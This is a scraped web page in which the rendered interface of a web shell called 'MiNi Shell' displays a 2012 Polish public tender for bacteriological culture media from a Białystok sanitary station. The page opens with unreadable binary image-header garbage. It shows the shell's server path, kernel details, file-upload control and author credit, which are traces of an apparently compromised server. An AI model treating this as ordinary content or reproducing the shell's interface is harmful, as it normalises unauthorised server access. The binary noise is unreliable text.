JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120326/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120326/93492-N-2012.html

<p class="kh_header"><b>Białystok: Dostawa podłoży bakteriologicznych suchych, podłoży gotowych na płytkach Petriego oraz podłoży gotowych w probówkach</b><br>
<b>Numer ogłoszenia: 93492 - 2012; data zamieszczenia: 26.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzka Stacja Sanitarno-Epidemiologiczna w Białymstoku , ul. Legionowa 8, 15-099 Białystok, woj. podlaskie, tel. 085 7408587, 7408580, faks 085 7404895.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wsse.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Wojewódzka Stacja Sanitarno-Epidemiologiczna w Białymstoku.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa podłoży bakteriologicznych suchych, podłoży gotowych na płytkach Petriego oraz podłoży gotowych w probówkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o udzielenie zamówienia publicznego prowadzone jest w trybie przetargu nieograniczonego o wartości szacunkowej zamówienia nie przekraczającej kwot określonych w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29.01.2004r. - Prawo zamówień publicznych.
1.	Przedmiotem zamówienia jest dostawa podłoży bakteriologicznych suchych, podłoży gotowych na płytkach Petriego oraz podłoży gotowych w probówkach na potrzeby Wojewódzkiej Stacji Sanitarno-Epidemiologicznej w Białymstoku, zgodnie z wymaganiami ilościowymi i jakościowymi określonymi w załączniku nr 1.1 do oferty - CENNIKU. 
2.	  Zamawiający dopuszcza składanie ofert częściowych (jako część zamówienia należy traktować osobno każdy  pakiet wymieniony w załączniku nr 1.1 do oferty - CENNIKU - aby oferta na dany pakiet była ważna należy wycenić wszystkie pozycje wymienione w ramach danego pakietu).
3.	Zamawiający nie dopuszcza składania ofert wariantowych.
4.	Przed wyborem najkorzystniejszej oferty, Zamawiający zastrzega sobie możliwość bezpłatnego przetestowania wybranych próbek podłoży i dopiero po uzyskaniu pozytywnych wyników (potwierdzających jakość podłoży) nastąpi zatwierdzenie wyboru oferty - wskazany Wykonawca na żądanie Zamawiającego zobowiązany jest do dostarczenia wybranych podłoży do przetestowania w terminie 3 dni roboczych od daty otrzymania stosownego wezwania; wykonawca zobowiązany jest do bezpłatnego dostarczenia minimalnej gramatury opakowań podłoży wytypowanych przez Zamawiającego do przetestowania, tj.: 
1) w przypadku podłoży bakteriologicznych suchych - opakowanie min. 100 g (plus odpowiednia ilość suplementu jeżeli jest wymagany);
2) w przypadku podłoży gotowych na płytkach Petriego - opakowanie min. 15 szt. (płytek). 
5.	Wykonawca ma obowiązek wykazać, że przedmiot zamówienia spełnia określone kryteria, zawarte w załączniku nr 1.1 do oferty - CENNIKU, w szczególności:
1)	WYMAGANIA DO PODŁOŻY Z PAKIETÓW OD 1 DO 5
a)	wszystkie podłoża muszą pochodzić wyłącznie od producentów posiadających aktualny certyfikat ISO 9001 i ISO 13485 (lub równoważne), co powinno być udokumentowane odpowiednimi certyfikatami producenta (dołączyć do oferty); Oferowane podłoża powinny posiadać Certyfikaty Kontroli Jakości każdej partii produktów oraz spełniać inne wymagania określone w odrębnych przepisach prawnych i normalizacyjnych dla rodzaju produktu (dołączyć do oferty). Wykonawcy są zobowiązani do przedstawienia składu wszystkich oferowanych podłoży oraz sposobu przygotowywania pożywek. Informacje te powinny stanowić oddzielny, spięty (zszyty) załącznik do oferty.
b)	Wykonawcy powinni dostarczyć pożywki suche, których trwałość wynosi od 3 do 5 lat od daty produkcji.
c)	przy podłożach, do których niezbędny jest suplement/dodatek wykonawcy powinni składać oferty na oba komponenty razem, podając jednocześnie ilość suplementu/dodatku (podłoże i suplement/ dodatek powinny być z tej samej firmy). Jedna fiolka suplementu (liofilizatu) powinna być dostosowana na 500 ml gotowego podłoża tej samej firmy. Fiolki z suplementami pakowane maksymalnie po 10 sztuk w formie liofilizatu. Dla podłoża Half-Frasera - jedna fiolka suplementu na 225 ml gotowego podłoża tej samej firmy. Wykonawcy są zobowiązani do podania w celach informacyjnych na oddzielnej karcie dokładnego przeliczenia ilości suplementu niezbędnego do wykonania pożywek z 500g podłoża podstawowego.
d)	Wykonawcy powinni dostarczyć przedmiot zamówienia partiami zgodnie ze zgłoszonym zapotrzebowaniem zamawiającego w terminie nie dłuższym niż 21 dni od daty otrzymania zamówienia.
e)	Wykonawcy powinni zapewnić możliwość zakupu pożywek w wymienionej dokumentacji z jednej serii.
f)	każda dostarczona partia pożywek suchych i dodatków selektywnych musi posiadać dokumentację zawierającą: nazwę pożywki, listę składników i suplementów , (nr katalogowy), nr serii produkcyjnej, nr partii produkcyjnej, dane dotyczące drobnoustrojów użytych do oceny pożywki, datę przydatności do użycia, wartość pH przed użyciem pożywki, dane dotyczące warunków przechowywania, kartę charakterystyki, świadectwo kontroli jakości danej partii produktu od producenta.
g)	Wykonawcy powinni dostarczyć pożywki z instrukcją w języku polskim, dokładnie oznakowane oryginalną etykietą o zawartości substancji toksycznych (z kartą substancji niebezpiecznych - o ile są wymagane), z podaniem dokładnej daty ważności.
h)	dostarczone pożywki wraz z suplementami i innymi dodatkowymi składnikami po sporządzeniu w laboratorium Zamawiającego nie mogą mieć krótszego terminu ważności niż 5 dni.
i)	odzysk dla pożywki: stałej wyrażony procentowo - minimum 70 %, kontrola mikrobiologiczna przy użyciu szczepów: Legionella pneumophila ATCCR33152, Legionela pneumophila ATCCR33156, Legionella pneumophila Wildtyp, Escherichia coli ATCCR8739, Pseudomonas aeruginosa ATCCR27853, Enterococcus faecalis CIP 106877.
j)	kontrola mikrobiologiczna przy użyciu szczepów Legionella pneumophila ATCCR33152, Legionella pneumophila ATCCR33156, Escherichia coli CIP 106878, odzysk dla pożywki stałej wyrażony procentowo- minimum 70%.
k)	nadruk na denku płytki powinien być czytelny i zawierać nazwę pożywki, nr serii, datę ważności i godzinę rozlania.
2)	WYMAGANIA DO PODŁOŻY Z PAKIETU 6
a)	dot. pozycji 1 - Certyfikaty jakości należy dostarczyć z podaniem żyzności wykonanej na szczepach referencyjnych (w szczególności żyzność należy dostarczyć z procentowym odzyskiem danego szczepu referencyjnego). Ponadto certyfikat jakości powinien zawierać: nazwę producenta, nazwę produktu, numer serii, datę ważności, skład pożywki, ogólną charakterystykę pożywki (kolor, pH, opakowanie, sterylność), charakterystykę mikrobiologiczną szczepów kontrolnych z kolekcji ATCC. Odzysk dla pożywki suchej wyrażony procentowo - minimum 70 %   
b)	dot. pozycji 2 - Certyfikaty jakości należy dostarczyć z podaniem żyzności wykonanej na szczepach referencyjnych. Ponadto certyfikat jakości powinien zawierać: nazwę producenta, nazwę produktu, numer serii, datę ważności, skład pożywki, ogólną charakterystykę pożywki (kolor, pH, opakowanie, sterylność), charakterystykę mikrobiologiczną szczepów kontrolnych z kolekcji ATCC.    
c)	dot. pozycji 1 i 2 - Kontrola jakości pożywki przeprowadzona zgodnie z normą PN-EN 12322 i ISO/TS 11133.
3)	WYMAGANIA DO PODŁOŻY Z PAKIETU 7
a)	dostarczanie podłoży gotowych: zapewnienie odpowiednich warunków ich transportu - niezależnie od temperatury otoczenia, przez cały rok kalendarzowy, na koszt dostawcy/producenta.
b)	certyfikaty jakości należy dostarczyć z podaniem żyzności wykonanej na szczepach referencyjnych (w szczególności żyzność dla pożywek agarowych należy dostarczyć z procentowym odzyskiem danego szczepu referencyjnego). Ponadto certyfikat jakości powinien zawierać: nazwę producenta, nazwę produktu, numer serii, datę ważności, skład pożywki, ogólną charakterystykę pożywki (kolor, pH, opakowanie, sterylność), charakterystykę mikrobiologiczną szczepów kontrolnych z kolekcji ATCC. Odzysk dla pożywki stałej wyrażony procentowo - minimum 70 %, dla pożywki płynnej - żyzność wystarczająca (wzrost co najmniej 10 kolonii szczepu specyficznego na pożywce selektywnej) oraz selektywność wystarczająca (brak wzrostu lub wzrost poniżej 10 kolonii szczepu niespecyficznego na pożywce nieselektywnej).   
c)	kontrola jakości pożywki przeprowadzona zgodnie z normą PN-EN 12322 i ISO/TS 11133.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.81.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia/nie spełnia. Nie wykazanie spełnienia warunku skutkować będzie wykluczeniem wykonawcy z postępowania o udzielenie zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia/nie spełnia. Nie wykazanie spełnienia warunku skutkować będzie wykluczeniem wykonawcy z postępowania o udzielenie zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia/nie spełnia. Nie wykazanie spełnienia warunku skutkować będzie wykluczeniem wykonawcy z postępowania o udzielenie zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia/nie spełnia. Nie wykazanie spełnienia warunku skutkować będzie wykluczeniem wykonawcy z postępowania o udzielenie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane przez wykonawcę dostawy odpowiadają wymaganiom określonym przez zamawiającego w Specyfikacji Istotnych Warunków Zamówienia, do oferty należy obligatoryjnie dołączyć:
1) WYMAGANIA DLA PAKIETÓW OD 1 DO 5: 
a)	zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że oferowane produkty odpowiadają określonym normom lub specyfikacjom technicznym - tzn. do wszystkich podłoży wymienionych w pakietach 1-5 dołączyć należy certyfikaty jakości i instrukcje wykonania (oba dokumenty w jęz. polskim lub łącznie z tłumaczeniem na jęz. polski poświadczonym przez wykonawcę);
b)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich - tzn. dołączyć należy aktualne certyfikaty ISO 9001 oraz ISO 13485 (lub równoważne) producentów wszystkich oferowanych podłoży (oba rodzaje certyfikatów w języku polskim lub łącznie z tłumaczeniem na język polski poświadczonym przez wykonawcę);           
c)	dokładne przeliczenie ilości suplementu niezbędnego do wykonania pożywek z 500g podłoża podstawowego - w celach informacyjnych na oddzielnej karcie (dotyczy wszystkich pożywek sypkich, do których zamawiający żąda wycenienia suplementu).
2) WYMAGANIA DLA PAKIETU 6:
a)	zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że oferowane produkty odpowiadają określonym normom lub specyfikacjom technicznym - tzn. do wszystkich podłoży wymienionych w pakiecie 6 dołączyć należy certyfikaty jakości (w język polskim lub łącznie z tłumaczeniem na jęz. polski poświadczonym przez wykonawcę); 
b)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich - tzn. dołączyć należy aktualne certyfikaty ISO 9001 oraz PN-EN ISO 13485 (lub równoważne) producentów wszystkich oferowanych podłoży (oba rodzaje certyfikatów w języku polskim lub łącznie z tłumaczeniem na język polski poświadczonym przez wykonawcę).
3) WYMAGANIA DLA PAKIETU 7: 
a)	zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że oferowane produkty odpowiadają określonym normom lub specyfikacjom technicznym - tzn. do wszystkich podłoży wymienionych w pakiecie 7 dołączyć należy certyfikaty jakości (w język polskim lub łącznie z tłumaczeniem na jęz. polski poświadczonym przez wykonawcę); 
b)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich - tzn. dołączyć należy aktualne certyfikaty ISO 9001 oraz PN-EN ISO 13485 (lub równoważne) producentów wszystkich oferowanych podłoży (oba rodzaje certyfikatów w języku polskim lub łącznie z tłumaczeniem na język polski poświadczonym przez wykonawcę).</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>X pełnomocnictwo, w przypadku gdy w imieniu wykonawcy ofertę składa pełnomocnik (oryginalny dokument)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wzór umowy stanowi załącznik Nr 2 do SIWZ.
2.	Wszelkie zmiany niniejszej umowy wymagają formy pisemnej (aneksu) pod rygorem jej nieważności.
3.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem przypadków, które dotyczą:
1)	nazwy producenta, nazwy przedmiotu zamówienia, opisu jego parametrów technicznych, wymagań jakościowych - w przypadku zastąpienia przedmiotu zamówienia określonego w załączniku nr 1 do umowy, przedmiotem zamówienia równoważnym (w przypadku braku dostępności, np. wskutek wycofania z obrotu przez danego producenta lub z innego powodu wskazanego przez Wykonawcę), przy czym zamiana ta nie może spowodować podwyższenia ceny wynikającej z oferty, na podstawie której Zamawiający dokonał wyboru Wykonawcy;
2)	nazwy producenta, nazwy przedmiotu zamówienia, opisu jego parametrów technicznych, wymagań jakościowych - w przypadku zastąpienia przedmiotu zamówienia określonego w załączniku nr 1 do umowy, przedmiotem zamówienia o wyższej jakości i lepszych parametrach użytkowych, przy czym zamiana ta nie może spowodować podwyższenia ceny wynikającej z oferty, na podstawie której Zamawiający dokonał wyboru Wykonawcy,
3)	wydłużenia czasu trwania umowy, w sytuacji niezrealizowania dostaw przedmiotu zamówienia w ilości przewidzianej w załączniku nr 1 do umowy, przy jednoczesnym zachowaniu jej wartości. 
4.	Inne dopuszczalne propozycje zmian postanowień zawartej umowy, niedotyczące bezpośrednio treści oferty na podstawie, której dokonano wyboru Wykonawcy, dotyczą zmian formalno-organizacyjnych zarówno po stronie Zamawiającego jak i Wykonawcy, tj.:  
- nazwy, adresu i siedziby, danych teleadresowych, wpisów do KRS lub innych właściwych ewidencji, 
- osób reprezentujących strony,
- osób odpowiedzialnych za realizację umowy i kontakty ze stroną przeciwną.   
5.	Wszystkie propozycje zmian postanowień zawartej umowy wymienione w ust. 2 oraz ust. 3, wymagają wyrażenia w formie pisemnej zgody Zamawiającego, na wprowadzenie tych zmian do obowiązującej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wsse.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzka Stacja Sanitarno-Epidemiologiczna w Białymstoku
15-099 Białystok, ul. Legionowa 8
Sekcja Zamówień Publicznych, pok. Nr 22
przetargi@wsse.bialystok.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.04.2012 godzina 10:00, miejsce: Wojewódzka Stacja Sanitarno-Epidemiologiczna w Białymstoku
15-099 Białystok, ul. Legionowa 8
Sekcja Zamówień Publicznych, pok. Nr 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com